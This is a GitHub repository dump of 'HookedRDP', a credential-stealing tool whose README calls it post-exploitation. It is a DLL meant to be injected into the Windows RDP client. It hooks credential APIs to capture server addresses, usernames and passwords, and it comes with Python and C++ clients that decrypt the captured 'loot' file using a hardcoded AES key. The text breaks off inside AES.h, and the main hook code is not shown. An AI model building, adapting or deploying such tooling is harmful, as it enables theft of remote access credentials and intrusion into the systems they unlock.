├── Image ├── dec.PNG ├── what.png └── Capture1.PNG ├── HookedRDP ├── HookedRDP.zip ├── nthelpers.h ├── framework.h ├── pch.cpp ├── pch.h ├── HookedHelpers.h ├── HookedRDP.vcxproj.filters ├── Base64.h ├── AES.h ├── dllmain.cpp └── HookedRDP.vcxproj ├── DecryptClient ├── DecryptClient │ ├── nthelpers.h │ ├── DecryptClient.vcxproj.filters │ ├── DecryptClient.cpp │ ├── Base64.h │ ├── AES.h │ └── DecryptClient.vcxproj ├── DecryptClient.py └── DecryptClient.sln ├── README.md ├── HookedRDP.sln ├── .gitattributes └── .gitignore /Image/dec.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch3rn0byl/HookedRDP/HEAD/Image/dec.PNG -------------------------------------------------------------------------------- /Image/what.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch3rn0byl/HookedRDP/HEAD/Image/what.png -------------------------------------------------------------------------------- /Image/Capture1.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch3rn0byl/HookedRDP/HEAD/Image/Capture1.PNG -------------------------------------------------------------------------------- /HookedRDP/HookedRDP.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch3rn0byl/HookedRDP/HEAD/HookedRDP/HookedRDP.zip -------------------------------------------------------------------------------- /HookedRDP/nthelpers.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) 3 | #define STATUS_UNSUCCESSFUL 0xC0000001 4 | #define STATUS_INVALID_BUFFER_SIZE 0xC0000206 -------------------------------------------------------------------------------- /HookedRDP/framework.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 4 | // Windows Header Files 5 | #include 6 | -------------------------------------------------------------------------------- /DecryptClient/DecryptClient/nthelpers.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) 3 | #define STATUS_UNSUCCESSFUL 0xC0000001 4 | #define STATUS_INVALID_BUFFER_SIZE 0xC0000206 -------------------------------------------------------------------------------- /HookedRDP/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to the pre-compiled header 2 | 3 | #include "pch.h" 4 | 5 | // When you are using pre-compiled headers, this source file is necessary for compilation to succeed. 6 | -------------------------------------------------------------------------------- /HookedRDP/pch.h: -------------------------------------------------------------------------------- 1 | // pch.h: This is a precompiled header file. 2 | // Files listed below are compiled only once, improving build performance for future builds. 3 | // This also affects IntelliSense performance, including code completion and many code browsing features. 4 | // However, files listed here are ALL re-compiled if any one of them is updated between builds. 5 | // Do not add files here that you will be updating frequently as this negates the performance advantage. 6 | 7 | #ifndef PCH_H 8 | #define PCH_H 9 | 10 | // add headers that you want to pre-compile here 11 | #include "framework.h" 12 | 13 | #endif //PCH_H 14 | -------------------------------------------------------------------------------- /HookedRDP/HookedHelpers.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #define SECURITY_WIN32 3 | 4 | #include 5 | #include 6 | #include 7 | 8 | struct RemoteDesktopValues 9 | { 10 | std::wstring lpServerAddress; 11 | std::wstring lpUsername; 12 | std::wstring lpPassword; 13 | } RemoteDesktop, * pRemoteDesktop; 14 | 15 | SECURITY_STATUS(WINAPI* True_SspiPrepareForCredRead)(PSEC_WINNT_AUTH_IDENTITY_OPAQUE AuthIdentity, PCWSTR pszTargetName, PULONG pCredmanCredentialType, PCWSTR* ppszCredmanTargetName) = SspiPrepareForCredRead; 16 | BOOL(WINAPI* True_CredRead)(LPCWSTR TargetName, DWORD Type, DWORD Flags, PCREDENTIAL* Credential) = CredRead; 17 | DPAPI_IMP BOOL(WINAPI* True_CryptProtectMemory)(LPVOID pDataIn, DWORD cbDataIn, DWORD dwFlags) = CryptProtectMemory; 18 | BOOL(WINAPI* True_CredIsMarshaledCredential)(LPCWSTR MarshaledCredential) = CredIsMarshaledCredential; -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # HookedRDP 2 | This dll is used to hook Windows' RDP client to snag information about the credentials and the server being connected to. You can check it out by reading their blog to get an idea of what exactly it does: https://www.mdsec.co.uk/2019/11/rdpthief-extracting-clear-text-credentials-from-remote-desktop-clients/. I'm not cool enough to use Cobalt Strike though.. 3 | 4 | This is a post exploitation type deal and you will need to inject the DLL somehow. There are numerous ways of doing so, and that will be left up to you to do. For now, this just uses the regular ol' MessageBox just as a PoC. The goodies I have done are not on here :) 5 | 6 | I had some issues with compiling their code and what not so kind of refactored a little code and added a thing or two to make it work with Win7 and Win10. It's compiled using Visual Studio 2019 7 | 8 | ![thingy](https://github.com/ch3rn0byl/HookedRDP/blob/master/Image/what.png) 9 | 10 | Update: The encrypted text coming along 11 | 12 | ![thingy](https://github.com/ch3rn0byl/HookedRDP/blob/master/Image/Capture1.PNG) 13 | 14 | Update: A client has been made to decrypt the output of the loot 15 | 16 | ![thingy](https://github.com/ch3rn0byl/HookedRDP/blob/master/Image/dec.PNG) 17 | 18 | # TO-DO 19 | Make a client/server type deal that way I can snag it remotely? That would be nice af 20 | And more, because this is a work in progress 21 | -------------------------------------------------------------------------------- /DecryptClient/DecryptClient/DecryptClient.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | Header Files 28 | 29 | 30 | Header Files 31 | 32 | 33 | -------------------------------------------------------------------------------- /DecryptClient/DecryptClient.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import binascii 3 | import base64 4 | import sys 5 | try: 6 | from Crypto.Cipher import AES 7 | import Crypto.Cipher.AES 8 | except ModuleNotFoundError as e: 9 | print('[!] {}'.format(e)) 10 | sys.exit(-1) 11 | 12 | key = binascii.unhexlify(b'000102030405060708090a0b0c0d0e0f') 13 | IV = binascii.unhexlify(b'000102030405060708090a0b0c0d0e0f') 14 | 15 | if not sys.version_info.major == 3: 16 | print('[!] This was written in Python3!') 17 | sys.exit(0) 18 | 19 | def main(arguments): 20 | lpFileName = arguments.f 21 | 22 | print('\n\t--==[[ Fancy Name Decrypter Thingy ]]==--\n') 23 | print('[+] Reading {}...'.format(lpFileName)) 24 | with open(lpFileName) as file: 25 | loot = file.readlines() 26 | 27 | decipher = AES.new(key, AES.MODE_CBC, IV) 28 | 29 | for item in loot: 30 | if item.endswith('\n'): 31 | item = item.strip() 32 | item = base64.b64decode(item) 33 | print('[+] Loot: {}'.format(decipher.decrypt(item))) 34 | print('[+] Done!') 35 | 36 | if __name__ == '__main__': 37 | parser = argparse.ArgumentParser( 38 | description='This decrypts the file given for clear text credentials', 39 | epilog='Please use responsibly for evil, hehehe' 40 | ) 41 | parser.add_argument('-f', metavar='file', help='The file with encrypted content', required=True) 42 | args = parser.parse_args() 43 | main(args) -------------------------------------------------------------------------------- /HookedRDP.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29519.181 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HookedRDP", "HookedRDP\HookedRDP.vcxproj", "{5551A396-06A3-4391-BFEC-A42F4560A322}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {5551A396-06A3-4391-BFEC-A42F4560A322}.Debug|x64.ActiveCfg = Debug|x64 17 | {5551A396-06A3-4391-BFEC-A42F4560A322}.Debug|x64.Build.0 = Debug|x64 18 | {5551A396-06A3-4391-BFEC-A42F4560A322}.Debug|x86.ActiveCfg = Debug|Win32 19 | {5551A396-06A3-4391-BFEC-A42F4560A322}.Debug|x86.Build.0 = Debug|Win32 20 | {5551A396-06A3-4391-BFEC-A42F4560A322}.Release|x64.ActiveCfg = Release|x64 21 | {5551A396-06A3-4391-BFEC-A42F4560A322}.Release|x64.Build.0 = Release|x64 22 | {5551A396-06A3-4391-BFEC-A42F4560A322}.Release|x86.ActiveCfg = Release|Win32 23 | {5551A396-06A3-4391-BFEC-A42F4560A322}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {1E1CE6B5-E4D3-4D01-8289-5B2CA523438E} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /DecryptClient/DecryptClient.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29519.181 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DecryptClient", "DecryptClient\DecryptClient.vcxproj", "{42F0BE83-04A5-4E65-A129-CD3AF3398644}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {42F0BE83-04A5-4E65-A129-CD3AF3398644}.Debug|x64.ActiveCfg = Debug|x64 17 | {42F0BE83-04A5-4E65-A129-CD3AF3398644}.Debug|x64.Build.0 = Debug|x64 18 | {42F0BE83-04A5-4E65-A129-CD3AF3398644}.Debug|x86.ActiveCfg = Debug|Win32 19 | {42F0BE83-04A5-4E65-A129-CD3AF3398644}.Debug|x86.Build.0 = Debug|Win32 20 | {42F0BE83-04A5-4E65-A129-CD3AF3398644}.Release|x64.ActiveCfg = Release|x64 21 | {42F0BE83-04A5-4E65-A129-CD3AF3398644}.Release|x64.Build.0 = Release|x64 22 | {42F0BE83-04A5-4E65-A129-CD3AF3398644}.Release|x86.ActiveCfg = Release|Win32 23 | {42F0BE83-04A5-4E65-A129-CD3AF3398644}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {9F6F5814-AE2D-443D-910B-C0936E076512} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /DecryptClient/DecryptClient/DecryptClient.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #include "Base64.h" 8 | #include "AES.h" 9 | 10 | int main(int argc, char* argv[]) 11 | { 12 | std::string lpFileName; 13 | std::string EncryptedString; 14 | 15 | std::vector Treasure; 16 | 17 | std::cout << "\n\t--==[[ Fancy Name Decrypter Thingy ]]==--\n" << std::endl; 18 | if (argc != 2) 19 | { 20 | std::cerr << "[!] Usage: " << argv[0] << " EncryptedFile" << std::endl; 21 | return EXIT_FAILURE; 22 | } 23 | else 24 | { 25 | lpFileName = argv[1]; 26 | } 27 | 28 | std::ifstream L00T(lpFileName, std::ios::binary); 29 | if (L00T.is_open()) 30 | { 31 | while (std::getline(L00T, EncryptedString)) 32 | { 33 | Treasure.push_back(EncryptedString); 34 | } 35 | } 36 | else 37 | { 38 | std::cerr << "[!] Unable to open " << lpFileName << "!" << std::endl; 39 | return EXIT_FAILURE; 40 | } 41 | 42 | // Start initializing AES and what not 43 | AES* DecryptMe = new AES(); 44 | if (!DecryptMe->initialize()) 45 | { 46 | std::cerr << "[!] Unable to be initialized!" << std::endl; 47 | return EXIT_FAILURE; 48 | } 49 | 50 | std::cout << "[+] Reading " << lpFileName << "..." << std::endl; 51 | for (auto i : Treasure) 52 | { 53 | auto decoded = base64::decode(i); 54 | 55 | DecryptMe->CNGDecrypt(i); 56 | std::cout << "[+] Loot: " << DecryptMe->GetDecryptedString() << std::endl; 57 | } 58 | std::cout << "[+] Done!" << std::endl; 59 | 60 | return EXIT_SUCCESS; 61 | } -------------------------------------------------------------------------------- /HookedRDP/HookedRDP.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | Header Files 29 | 30 | 31 | Header Files 32 | 33 | 34 | Header Files 35 | 36 | 37 | 38 | 39 | Source Files 40 | 41 | 42 | Source Files 43 | 44 | 45 | -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /HookedRDP/Base64.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | namespace base64 8 | { 9 | static const char kEncodeLookup[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; 10 | static const char kPadCharacter = '='; 11 | 12 | using byte = std::uint8_t; 13 | 14 | inline std::string encode(const std::vector& input) 15 | { 16 | std::string encoded; 17 | encoded.reserve(((input.size() / 3) + (input.size() % 3 > 0)) * 4); 18 | 19 | std::uint32_t temp{}; 20 | auto it = input.begin(); 21 | 22 | for (std::size_t i = 0; i < input.size() / 3; ++i) 23 | { 24 | temp = (*it++) << 16; 25 | temp += (*it++) << 8; 26 | temp += (*it++); 27 | encoded.append(1, kEncodeLookup[(temp & 0x00FC0000) >> 18]); 28 | encoded.append(1, kEncodeLookup[(temp & 0x0003F000) >> 12]); 29 | encoded.append(1, kEncodeLookup[(temp & 0x00000FC0) >> 6]); 30 | encoded.append(1, kEncodeLookup[(temp & 0x0000003F)]); 31 | } 32 | 33 | switch (input.size() % 3) 34 | { 35 | case 1: 36 | temp = (*it++) << 16; 37 | encoded.append(1, kEncodeLookup[(temp & 0x00FC0000) >> 18]); 38 | encoded.append(1, kEncodeLookup[(temp & 0x0003F000) >> 12]); 39 | encoded.append(2, kPadCharacter); 40 | break; 41 | case 2: 42 | temp = (*it++) << 16; 43 | temp += (*it++) << 8; 44 | encoded.append(1, kEncodeLookup[(temp & 0x00FC0000) >> 18]); 45 | encoded.append(1, kEncodeLookup[(temp & 0x0003F000) >> 12]); 46 | encoded.append(1, kEncodeLookup[(temp & 0x00000FC0) >> 6]); 47 | encoded.append(1, kPadCharacter); 48 | break; 49 | } 50 | 51 | return encoded; 52 | } 53 | 54 | std::vector decode(const std::string& input) 55 | { 56 | if (input.length() % 4) 57 | throw std::runtime_error("Invalid base64 length!"); 58 | 59 | std::size_t padding{}; 60 | 61 | if (input.length()) 62 | { 63 | if (input[input.length() - 1] == kPadCharacter) padding++; 64 | if (input[input.length() - 2] == kPadCharacter) padding++; 65 | } 66 | 67 | std::vector decoded; 68 | decoded.reserve(((input.length() / 4) * 3) - padding); 69 | 70 | std::uint32_t temp{}; 71 | auto it = input.begin(); 72 | 73 | while (it < input.end()) 74 | { 75 | for (std::size_t i = 0; i < 4; ++i) 76 | { 77 | temp <<= 6; 78 | if (*it >= 0x41 && *it <= 0x5A) temp |= *it - 0x41; 79 | else if (*it >= 0x61 && *it <= 0x7A) temp |= *it - 0x47; 80 | else if (*it >= 0x30 && *it <= 0x39) temp |= *it + 0x04; 81 | else if (*it == 0x2B) temp |= 0x3E; 82 | else if (*it == 0x2F) temp |= 0x3F; 83 | else if (*it == kPadCharacter) 84 | { 85 | switch (input.end() - it) 86 | { 87 | case 1: 88 | decoded.push_back((temp >> 16) & 0x000000FF); 89 | decoded.push_back((temp >> 8) & 0x000000FF); 90 | return decoded; 91 | case 2: 92 | decoded.push_back((temp >> 10) & 0x000000FF); 93 | return decoded; 94 | default: 95 | throw std::runtime_error("Invalid padding in base64!"); 96 | } 97 | } 98 | else throw std::runtime_error("Invalid character in base64!"); 99 | 100 | ++it; 101 | } 102 | 103 | decoded.push_back((temp >> 16) & 0x000000FF); 104 | decoded.push_back((temp >> 8) & 0x000000FF); 105 | decoded.push_back((temp) & 0x000000FF); 106 | } 107 | 108 | return decoded; 109 | } 110 | } -------------------------------------------------------------------------------- /DecryptClient/DecryptClient/Base64.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | namespace base64 9 | { 10 | static const char kEncodeLookup[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; 11 | static const char kPadCharacter = '='; 12 | 13 | using byte = std::uint8_t; 14 | 15 | inline std::string encode(const std::vector& input) 16 | { 17 | std::string encoded; 18 | encoded.reserve(((input.size() / 3) + (input.size() % 3 > 0)) * 4); 19 | 20 | std::uint32_t temp{}; 21 | auto it = input.begin(); 22 | 23 | for (std::size_t i = 0; i < input.size() / 3; ++i) 24 | { 25 | temp = (*it++) << 16; 26 | temp += (*it++) << 8; 27 | temp += (*it++); 28 | encoded.append(1, kEncodeLookup[(temp & 0x00FC0000) >> 18]); 29 | encoded.append(1, kEncodeLookup[(temp & 0x0003F000) >> 12]); 30 | encoded.append(1, kEncodeLookup[(temp & 0x00000FC0) >> 6]); 31 | encoded.append(1, kEncodeLookup[(temp & 0x0000003F)]); 32 | } 33 | 34 | switch (input.size() % 3) 35 | { 36 | case 1: 37 | temp = (*it++) << 16; 38 | encoded.append(1, kEncodeLookup[(temp & 0x00FC0000) >> 18]); 39 | encoded.append(1, kEncodeLookup[(temp & 0x0003F000) >> 12]); 40 | encoded.append(2, kPadCharacter); 41 | break; 42 | case 2: 43 | temp = (*it++) << 16; 44 | temp += (*it++) << 8; 45 | encoded.append(1, kEncodeLookup[(temp & 0x00FC0000) >> 18]); 46 | encoded.append(1, kEncodeLookup[(temp & 0x0003F000) >> 12]); 47 | encoded.append(1, kEncodeLookup[(temp & 0x00000FC0) >> 6]); 48 | encoded.append(1, kPadCharacter); 49 | break; 50 | } 51 | 52 | return encoded; 53 | } 54 | 55 | std::vector decode(const std::string& input) 56 | { 57 | if (input.length() % 4) 58 | throw std::runtime_error("Invalid base64 length!"); 59 | 60 | std::size_t padding{}; 61 | 62 | if (input.length()) 63 | { 64 | if (input[input.length() - 1] == kPadCharacter) padding++; 65 | if (input[input.length() - 2] == kPadCharacter) padding++; 66 | } 67 | 68 | std::vector decoded; 69 | decoded.reserve(((input.length() / 4) * 3) - padding); 70 | 71 | std::uint32_t temp{}; 72 | auto it = input.begin(); 73 | 74 | while (it < input.end()) 75 | { 76 | for (std::size_t i = 0; i < 4; ++i) 77 | { 78 | temp <<= 6; 79 | if (*it >= 0x41 && *it <= 0x5A) temp |= *it - 0x41; 80 | else if (*it >= 0x61 && *it <= 0x7A) temp |= *it - 0x47; 81 | else if (*it >= 0x30 && *it <= 0x39) temp |= *it + 0x04; 82 | else if (*it == 0x2B) temp |= 0x3E; 83 | else if (*it == 0x2F) temp |= 0x3F; 84 | else if (*it == kPadCharacter) 85 | { 86 | switch (input.end() - it) 87 | { 88 | case 1: 89 | decoded.push_back((temp >> 16) & 0x000000FF); 90 | decoded.push_back((temp >> 8) & 0x000000FF); 91 | return decoded; 92 | case 2: 93 | decoded.push_back((temp >> 10) & 0x000000FF); 94 | return decoded; 95 | default: 96 | throw std::runtime_error("Invalid padding in base64!"); 97 | } 98 | } 99 | else throw std::runtime_error("Invalid character in base64!"); 100 | 101 | ++it; 102 | } 103 | 104 | decoded.push_back((temp >> 16) & 0x000000FF); 105 | decoded.push_back((temp >> 8) & 0x000000FF); 106 | decoded.push_back((temp) & 0x000000FF); 107 | } 108 | 109 | return decoded; 110 | } 111 | } -------------------------------------------------------------------------------- /DecryptClient/DecryptClient/AES.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | 6 | #include "nthelpers.h" 7 | #include "Base64.h" 8 | 9 | #pragma comment(lib, "Bcrypt.lib") 10 | 11 | static const BYTE rgbIV[] = 12 | { 13 | 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 14 | 0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F 15 | }; 16 | 17 | static const BYTE rgbAES128Key[] = 18 | { 19 | 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 20 | 0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F 21 | }; 22 | 23 | class AES 24 | { 25 | private: 26 | BCRYPT_ALG_HANDLE hAlgorithm = NULL; 27 | BCRYPT_KEY_HANDLE hKey = NULL; 28 | NTSTATUS status = STATUS_UNSUCCESSFUL; 29 | protected: 30 | DWORD cbKeyObject = 0; 31 | DWORD cbData = 0; 32 | DWORD cbBlockLen = 0; 33 | DWORD cbBlob = 0; 34 | DWORD cbPlainText = 0; 35 | DWORD cbCipherText = 0; 36 | 37 | PBYTE pbKeyObject = NULL; 38 | PBYTE pbIV = NULL; 39 | PBYTE pbBlob = NULL; 40 | PBYTE pbPlainText = NULL; 41 | PBYTE pbCipherText = NULL; 42 | public: 43 | AES() {} 44 | ~AES() 45 | { 46 | if (hKey != NULL) 47 | { 48 | BCryptDestroyKey(hKey); 49 | } 50 | if (hAlgorithm != NULL) 51 | { 52 | BCryptCloseAlgorithmProvider(hAlgorithm, 0); 53 | } 54 | if (pbKeyObject != NULL) 55 | { 56 | delete[] pbKeyObject; 57 | } 58 | if (pbIV != NULL) 59 | { 60 | delete[] pbIV; 61 | } 62 | if (pbBlob != NULL) 63 | { 64 | delete[] pbBlob; 65 | } 66 | if (pbPlainText != NULL) 67 | { 68 | delete[] pbPlainText; 69 | } 70 | } 71 | 72 | BOOL initialize() 73 | { 74 | // Opens the algorithm handle 75 | status = BCryptOpenAlgorithmProvider(&hAlgorithm, BCRYPT_AES_ALGORITHM, NULL, 0); 76 | if (!NT_SUCCESS(status)) 77 | { 78 | return false; 79 | } 80 | 81 | // Calculates the size of the buffer to hold the KeyObject 82 | status = BCryptGetProperty(hAlgorithm, BCRYPT_OBJECT_LENGTH, reinterpret_cast(&cbKeyObject), sizeof(DWORD), &cbData, 0); 83 | if (!NT_SUCCESS(status)) 84 | { 85 | return false; 86 | } 87 | 88 | // Allocate the keyobject 89 | pbKeyObject = new BYTE[cbKeyObject]; 90 | 91 | // Get the block length for the IV 92 | status = BCryptGetProperty(hAlgorithm, BCRYPT_BLOCK_LENGTH, reinterpret_cast(&cbBlockLen), sizeof(DWORD), &cbData, 0); 93 | if (!NT_SUCCESS(status)) 94 | { 95 | return false; 96 | } 97 | 98 | // Determine whether the cbBlockLen is not longer than the IV length 99 | if (cbBlockLen > sizeof(rgbIV)) 100 | { 101 | status = STATUS_INVALID_BUFFER_SIZE; 102 | return false; 103 | } 104 | 105 | // Allocates the buffer for the IV. It is needed for the encrypt/decrypt process 106 | pbIV = new BYTE[cbBlockLen]; 107 | 108 | RtlCopyMemory(pbIV, rgbIV, cbBlockLen); 109 | 110 | status = BCryptSetProperty(hAlgorithm, BCRYPT_CHAINING_MODE, (PBYTE)BCRYPT_CHAIN_MODE_CBC, sizeof(BCRYPT_CHAIN_MODE_CBC), 0); 111 | if (!NT_SUCCESS(status)) 112 | { 113 | return false; 114 | } 115 | 116 | // Generate the key from supplied input key bytes 117 | status = BCryptGenerateSymmetricKey(hAlgorithm, &hKey, pbKeyObject, cbKeyObject, (PBYTE)rgbAES128Key, sizeof(rgbAES128Key), 0); 118 | if (!NT_SUCCESS(status)) 119 | { 120 | return false; 121 | } 122 | 123 | // Save the copy because its going to get nuked 124 | status = BCryptExportKey(hKey, NULL, BCRYPT_OPAQUE_KEY_BLOB, NULL, 0, &cbBlob, 0); 125 | if (!NT_SUCCESS(status)) 126 | { 127 | return false; 128 | } 129 | 130 | // Allocate the buffer to hold the blob 131 | pbBlob = new BYTE[cbBlob]; 132 | 133 | status = BCryptExportKey(hKey, NULL, BCRYPT_OPAQUE_KEY_BLOB, pbBlob, cbBlob, &cbBlob, 0); 134 | if (!NT_SUCCESS(status)) 135 | { 136 | return false; 137 | } 138 | return true; 139 | } 140 | 141 | BOOL CNGDecrypt(std::string value) 142 | { 143 | std::vector data(std::begin(value), std::end(value)); 144 | auto decoded = base64::decode(value); 145 | 146 | if (pbPlainText) 147 | { 148 | delete[] pbPlainText; 149 | } 150 | 151 | ZeroMemory(pbKeyObject, cbKeyObject); 152 | RtlCopyMemory(pbIV, rgbIV, cbBlockLen); 153 | 154 | status = BCryptImportKey(hAlgorithm, NULL, BCRYPT_OPAQUE_KEY_BLOB, &hKey, pbKeyObject, cbKeyObject, pbBlob, cbBlob, 0); 155 | if (!NT_SUCCESS(status)) 156 | { 157 | return false; 158 | } 159 | 160 | cbPlainText = static_cast(decoded.size()); 161 | pbPlainText = new BYTE[cbPlainText]; 162 | 163 | // Get the output buffer size 164 | status = BCryptDecrypt(hKey, decoded.data(), static_cast(decoded.size()), NULL, pbIV, cbBlockLen, NULL, 0, &cbPlainText, BCRYPT_BLOCK_PADDING); 165 | if (!NT_SUCCESS(status)) 166 | { 167 | return false; 168 | } 169 | 170 | // supposed to be password 171 | status = BCryptDecrypt(hKey, decoded.data(), static_cast(decoded.size()), NULL, pbIV, cbBlockLen, pbPlainText, cbPlainText, &cbPlainText, BCRYPT_BLOCK_PADDING); 172 | if (!NT_SUCCESS(status)) 173 | { 174 | return false; 175 | } 176 | return true; 177 | } 178 | 179 | DWORD GetNTLastError() 180 | { 181 | return status; 182 | } 183 | 184 | PUCHAR GetDecryptedString() 185 | { 186 | return pbPlainText; 187 | } 188 | }; 189 | 190 | -------------------------------------------------------------------------------- /HookedRDP/AES.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | 5 | #include 6 | 7 | #include "nthelpers.h" 8 | 9 | #pragma comment(lib, "Bcrypt.lib") 10 | 11 | static const BYTE rgbIV[] = 12 | { 13 | 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 14 | 0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F 15 | }; 16 | 17 | static const BYTE rgbAES128Key[] = 18 | { 19 | 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 20 | 0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F 21 | }; 22 | 23 | class AES 24 | { 25 | private: 26 | BCRYPT_ALG_HANDLE hAlgorithm = NULL; 27 | BCRYPT_KEY_HANDLE hKey = NULL; 28 | NTSTATUS status = 